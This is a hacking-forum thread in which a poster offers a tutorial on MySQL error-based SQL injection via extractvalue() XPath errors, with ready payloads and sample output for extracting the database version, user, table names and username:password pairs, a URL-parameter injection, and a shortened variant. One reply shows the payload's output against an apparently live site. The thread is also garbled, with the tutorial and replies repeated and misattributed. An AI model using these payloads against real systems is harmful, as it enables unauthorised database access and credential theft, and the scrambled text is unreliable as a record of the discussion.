[RogueCoder]

Error-Based sql injection
(a "new" approach)

It's with great exitement that I'm writing this little tutorial. I have been messing around with SQL injection for a while, and there's nothing I love more in hacking than sql injection. But that being said, I fucking hate error based injection. A million nested select queries that you cannot even remember just to get the database version. Always having to keep the cheat sheet at hand. So after messing around a lot I have come across a method that is so much easier.

FIrst I will show an example that show's the old way and the new way. They are both doing the same thing, grabbing the database version

Old code:

Code:

' and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)

Output: Duplicate entry '5.5.32-0ubuntu0.13.04.1' for key 'group_key'

New code:

Code:

' and extractvalue('%3Cxml%3E',concat(%22\\%22,(select version())))

Output: XPATH syntax error: '\5.5.32-0ubuntu0.13.04.1'

As you can see, we get the exact same result. The only thing is that we're now using the XPath errors to display the content.

One thing to keep in mind, the XPath errors will show you results up to 32 characters, so if you're for example extracting sha1 hashed passwords you need to use substring to get the content.. Also keep in mind, we're adding a \ to create the error, so you're only seeing 31 characters or the query output.

Enough talk, let's get our hands dirty.

As shown above here's the code to get the database version

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select version())))

Output: XPATH syntax error: '\5.5.32-0ubuntu0.13.04.1'

Database and user

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select concat_ws('~',database(),user()))))

Output: XPATH syntax error: '\security~root@localhost'

Find number of tables in current database

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select count(*) from information_schema.tables where table_schema=database())))

Output: XPATH syntax error: '\4'

Get the names of all the tables (change the first number in limit to get the next table name)

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))

Output: XPATH syntax error: '\emails'

Extract content from a database (Just like the code above, increment the first number in the LIMIT clause to get the next result)

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select concat(username,':',password) from users limit 0,1)))

Output: XPATH syntax error: '\Dummy:p@ssword'

As you can see here, there's no need to be SQL guru to write error based SQL injections! You can really do whatever you want. Writing completely advanced queries inside the concat.

Another thing as well, when working with integer values you can inject this directly as the parameter like this

Code:

http://www.example.com/?id=extractvalue('<xml>',concat("\\",(select concat(username,':',password) from users limit 0,1)))

I hope you enjoyed this tutorial
Happy hacking

[RogueCoder]

Error-Based sql injection
(a "new" approach)

It's with great exitement that I'm writing this little tutorial. I have been messing around with SQL injection for a while, and there's nothing I love more in hacking than sql injection. But that being said, I fucking hate error based injection. A million nested select queries that you cannot even remember just to get the database version. Always having to keep the cheat sheet at hand. So after messing around a lot I have come across a method that is so much easier.

FIrst I will show an example that show's the old way and the new way. They are both doing the same thing, grabbing the database version

Old code:

Code:

' and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)

Output: Duplicate entry '5.5.32-0ubuntu0.13.04.1' for key 'group_key'

New code:

Code:

' and extractvalue('%3Cxml%3E',concat(%22\\%22,(select version())))

Output: XPATH syntax error: '\5.5.32-0ubuntu0.13.04.1'

As you can see, we get the exact same result. The only thing is that we're now using the XPath errors to display the content.

One thing to keep in mind, the XPath errors will show you results up to 32 characters, so if you're for example extracting sha1 hashed passwords you need to use substring to get the content.. Also keep in mind, we're adding a \ to create the error, so you're only seeing 31 characters or the query output.

Enough talk, let's get our hands dirty.

As shown above here's the code to get the database version

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select version())))

Output: XPATH syntax error: '\5.5.32-0ubuntu0.13.04.1'

Database and user

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select concat_ws('~',database(),user()))))

Output: XPATH syntax error: '\security~root@localhost'

Find number of tables in current database

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select count(*) from information_schema.tables where table_schema=database())))

Output: XPATH syntax error: '\4'

Get the names of all the tables (change the first number in limit to get the next table name)

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))

Output: XPATH syntax error: '\emails'

Extract content from a database (Just like the code above, increment the first number in the LIMIT clause to get the next result)

Code:

extractvalue('%3Cxml%3E',concat(%22\\%22,(select concat(username,':',password) from users limit 0,1)))

Output: XPATH syntax error: '\Dummy:p@ssword'

As you can see here, there's no need to be SQL guru to write error based SQL injections! You can really do whatever you want. Writing completely advanced queries inside the concat.

Another thing as well, when working with integer values you can inject this directly as the parameter like this

Code:

http://www.example.com/?id=extractvalue('<xml>',concat("\\",(select concat(username,':',password) from users limit 0,1)))

I hope you enjoyed this tutorial
Happy hacking

[zomgwtfbbq]

Awesome share, saves a lot of time.

[zomgwtfbbq]

Awesome share, saves a lot of time.

[RogueCoder]

Glad you liked it, after more research I've managed to simplify this even more. Replacing '%3Cxml%3E with null and %22\\%22 with 0x2a.. The rest cannot be touched so I guess this about as short as an error based sqli injection can get (at least to my current knowledge hehe)

Code:

and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

Also it should be mentioned, this works on MySQL >= 5.1

[RogueCoder]

Glad you liked it, after more research I've managed to simplify this even more. Replacing '%3Cxml%3E with null and %22\\%22 with 0x2a.. The rest cannot be touched so I guess this about as short as an error based sqli injection can get (at least to my current knowledge hehe)

Code:

and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

Also it should be mentioned, this works on MySQL >= 5.1

[EgyptGhost]

more thanks when i tried a new way the result is

Code:

An internal error has occured.
XPATH syntax error: 'information_schema'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

old way is working fine

[chmod]

more thanks when i tried a new way the result is

Code:

An internal error has occured.
XPATH syntax error: 'information_schema'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

old way is working fine

I see nothing wrong with that looks to be working to me

[EgyptGhost]

Glad you liked it, after more research I've managed to simplify this even more. Replacing '%3Cxml%3E with null and %22\\%22 with 0x2a.. The rest cannot be touched so I guess this about as short as an error based sqli injection can get (at least to my current knowledge hehe)

Code:

and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

Also it should be mentioned, this works on MySQL >= 5.1

or he can use url decoder

more thanks when i tried a new way the result is

Code:

An internal error has occured.
XPATH syntax error: 'information_schema'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

old way is working fine

I see nothing wrong with that looks to be working to me

i try again to discover wrong

[chmod]

Glad you liked it, after more research I've managed to simplify this even more. Replacing '%3Cxml%3E with null and %22\\%22 with 0x2a.. The rest cannot be touched so I guess this about as short as an error based sqli injection can get (at least to my current knowledge hehe)

Code:

and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

Also it should be mentioned, this works on MySQL >= 5.1

or he can use url decoder

more thanks when i tried a new way the result is

Code:

An internal error has occured.
XPATH syntax error: 'information_schema'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select schema_name from information_schema.schemata limit 0,1)))

old way is working fine

I see nothing wrong with that looks to be working to me

i try again to discover wrong

Look carefully this is error based injection so the error is normal your looking for for what the error contains

Code:

XPATH syntax error: 'information_schema'